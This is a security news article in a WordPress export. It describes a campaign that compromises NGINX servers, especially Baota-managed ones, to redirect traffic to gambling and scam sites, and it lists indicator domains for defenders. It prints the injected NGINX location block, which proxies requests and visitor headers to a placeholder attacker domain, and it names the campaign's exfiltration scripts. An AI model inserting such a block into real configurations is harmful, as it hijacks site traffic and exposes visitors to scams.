{"id":10415,"date":"2026-02-05T10:00:54","date_gmt":"2026-02-05T10:00:54","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2026\/02\/05\/threat-actors-hacking-nginx-servers-to-redirect-web-traffic-to-malicious-servers\/"},"modified":"2026-02-05T10:00:54","modified_gmt":"2026-02-05T10:00:54","slug":"threat-actors-hacking-nginx-servers-to-redirect-web-traffic-to-malicious-servers","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2026\/02\/05\/threat-actors-hacking-nginx-servers-to-redirect-web-traffic-to-malicious-servers\/","title":{"rendered":"Threat Actors Hacking NGINX Servers to Redirect Web Traffic to Malicious Servers"},"content":{"rendered":"

Threat Actors Hacking NGINX Servers to Redirect Web Traffic to Malicious Servers
\n \t

\n
<\/BR>
\n
\n \t

\n
<\/BR><\/p>\n

\n

A sophisticated campaign in which threat actors are stealthily compromising NGINX servers<\/a> to redirect web traffic to malicious destinations.<\/p>\n

The attackers, previously linked to \u201cReact2Shell<\/a>\u201d exploits, are now targeting NGINX configurations, specifically those using the Baota (BT) management panel, widely used in Asia.<\/p>\n

How the Attack Works<\/strong><\/h2>\n

Instead of installing traditional malware<\/a>, these attackers modify the server\u2019s legitimate configuration files.<\/p>\n

By injecting malicious directives into NGINX\u2019s\u00a0location\u00a0blocks, they can intercept user traffic and route it through attacker-controlled servers without the site owner noticing immediately.<\/p>\n

\"NGINX
NGINX attack flow diagram (source: Datadog Security Labs)<\/figcaption><\/figure>\n

The core of the attack relies on the\u00a0proxy_pass\u00a0directive. This standard NGINX feature is designed to forward traffic to backend servers (like a PHP application<\/a>).<\/p>\n

The campaign uses a straightforward, automated workflow involving several shell scripts:<\/p>\n

\n\n\n\n\n\n\n\n\n\n
Script Name<\/th>\n Role<\/th>\nPrimary Function<\/th>\nTarget <\/th>\n<\/tr>\n<\/thead>\n
zx.sh<\/strong><\/td>\nThe Orchestrator<\/td>\nInitializes environment and downloads required tools<\/td>\nActs as entry point for the attack chain<\/td>\n<\/tr>\n
bt.sh<\/strong><\/td>\nBaota Injector<\/td>\nScans for Baota panel configs and injects malicious code<\/td>\nTargets \/www\/server\/panel\/vhost\/nginx<\/code>\n<\/td>\n<\/tr>\n
4zdh.sh<\/strong><\/td>\nAdvanced Injection<\/td>\nInjects payload into NGINX configs after validation<\/td>\nTargets generic Linux NGINX installs<\/td>\n<\/tr>\n
zdh.sh<\/strong><\/td>\nAdvanced Injection<\/td>\nSame as 4zdh.sh with config verification<\/td>\nCollects and uploads the hijacked domain list<\/td>\n<\/tr>\n
ok.sh<\/strong><\/td>\nExfiltration<\/td>\nActs as an entry point for the attack chain<\/td>\nSends data to attacker C2 server<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n

However, the attackers reconfigure it to send users to their own malicious domains, such as gambling or scam sites<\/a>.<\/p>\n

They also use\u00a0proxy_set_header\u00a0to ensure the hijacked traffic<\/a> retains legitimate-looking headers, making the redirection harder to detect in standard logs.<\/p>\n

\nlocation \/%PATH%\/ {\n    set $fullurl \"$scheme:\/\/$host$request_uri\";\n    rewrite ^\/%PATH%\/?(.*)$ \/index.php?domain=$fullurl&$args break;\n    proxy_set_header Host [Attacker_Domain];\n    proxy_set_header X-Real-IP $remote_addr;\n    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;\n    proxy_set_header X-Forwarded-Proto $scheme;\n    proxy_set_header User-Agent $http_user_agent;\n    proxy_set_header Referer $http_referer;\n    proxy_ssl_server_name on;\n    proxy_pass http:\/\/[Attacker_Domain];\n}\n<\/code><\/pre>\n
The campaign heavily targets Asian Top-Level Domains (TLDs) like\u00a0.in,\u00a0.id,\u00a0.th, and\u00a0.bd, as well as government (.gov) and educational (.edu) websites.<\/p>\n
Datadog Security Research advises<\/a> administrators to check their NGINX configuration files for unexpected\u00a0proxy_pass\u00a0directives pointing to the following known malicious domains:\u200b<\/p>\n
\n\n\n\n\n\n\n\n
Indicator Type<\/th>\nValue<\/th>\nThreat Category<\/th>\nStatus<\/th>\nNotes<\/th>\n<\/tr>\n<\/thead>\n
Domain<\/td>\nxzz.pier46[.]com<\/strong><\/td>\nSuspected C2 \/ Malware Infrastructure<\/td>\nActive (unverified)<\/td>\nObserved in malicious campaign<\/td>\n<\/tr>\n
Domain<\/td>\nide.hashbank8[.]com<\/strong><\/td>\nSuspected C2 \/ Malware Infrastructure<\/td>\nActive (unverified)<\/td>\nUsed for attacker communications<\/td>\n<\/tr>\n
Domain<\/td>\nth.cogicpt[.]org<\/strong><\/td>\nSuspected C2 \/ Malware Infrastructure<\/td>\nActive (unverified)<\/td>\nPotential exfiltration endpoint<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n
Additionally, network logs showing traffic to IP\u00a0158.94.210[.]227\u00a0indicate active communication with the attackers\u2019 infrastructure.<\/p>\n
Follow us on Google News<\/a>, LinkedIn<\/a>, and X<\/a> for daily cybersecurity updates. Contact us<\/a> to feature your stories.<\/strong><\/p>\n
The post Threat Actors Hacking NGINX Servers to Redirect Web Traffic to Malicious Servers<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\n
 \t

\n 
<\/BR>
\n    Abinaya
\n \t

\n
<\/BR>
\nGo to cyber-security-news<\/a>
\n \t

\n 
<\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"
Threat Actors Hacking NGINX Servers to Redirect Web Traffic to Malicious Servers A sophisticated campaign in which threat actors are stealthily compromising NGINX servers to redirect web traffic to malicious destinations. The attackers, previously linked to \u201cReact2Shell\u201d exploits, are now targeting NGINX configurations, specifically those using the Baota (BT) management panel, widely used in Asia. […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1636,129,63],"tags":[130],"class_list":["post-10415","post","type-post","status-publish","format-standard","hentry","category-cyber-attack-news","category-cyber-security","category-cyber-security-news","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/10415"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=10415"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/10415\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=10415"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=10415"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=10415"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}